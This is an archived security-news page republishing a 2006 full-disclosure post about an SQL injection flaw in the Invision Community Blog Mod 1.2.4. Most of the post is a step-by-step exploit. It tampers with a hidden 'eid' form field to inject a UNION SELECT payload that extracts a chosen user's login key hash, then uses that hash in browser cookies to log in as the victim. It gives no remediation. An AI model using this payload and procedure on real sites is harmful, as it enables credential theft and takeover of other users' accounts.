Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b]

  [Full-disclosure] phpmyfaq exploit using PHP bug, CVE-2006-1490

  Invision Gallery  2.0.7 SQL Injection Vulnerability

  LifeType version 1.1.2 Multiple Path Disclosure Vulnerabilities

From:infection_(at)_mail.kz <infection_(at)_mail.kz>
Date:1 декабря 2006 г.
Subject:Invision Community Blog Mod 1.2.4 .PHP SQL Injection Vulnerability

1. Open any blog entry
2. Try to reply to any message
3. Push "Preview message" button (Do not post your reply)
4. Save source code of opened page to your PC
5. Find this string
<input type='hidden' name='eid' value='<BLOG_ENTRY_ID>' />

6. Change <BLOG_ENTRY_ID> with this SQL Injection:

<BLOG_ENTRY_ID> UNION  SELECT b.entry_id,  b.blog_id, b.category_id, b.entry_author_id,
b.entry_author_name, b.entry_date, member_login_key, b.entry_category, b.entry, b.entry_status,
b.entry_locked, b.entry_num_comments, b.entry_last_comment, b.entry_last_comment_date,
b.entry_last_comment_name, b.entry_last_comment_mid, b.entry_queued_comments, b.entry_has_attach,
b.entry_post_key, b.entry_edit_time, b.entry_edit_name, b.entry_html_state, b.entry_use_emo,
b.entry_trackbacks, b.entry_sent_trackbacks, b.entry_last_update, b.entry_gallery_album,
b.entry_poll_state, b.entry_last_vote FROM ibf_members, ipb_blog_entries b WHERE id=<USER_ID> and
b.entry_id=<BLOG_ENTRY_ID> LIMIT 1,1

<USER_ID> - ID of the user whom password you want to get.

7. Push "Preview Button" again.

8. After refresh instead of blog entry name you will get users's HASH password.

9. Change your cookies in your favorite browser and open board. You will be automaticaly logged in as
the user whom password you just got.

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород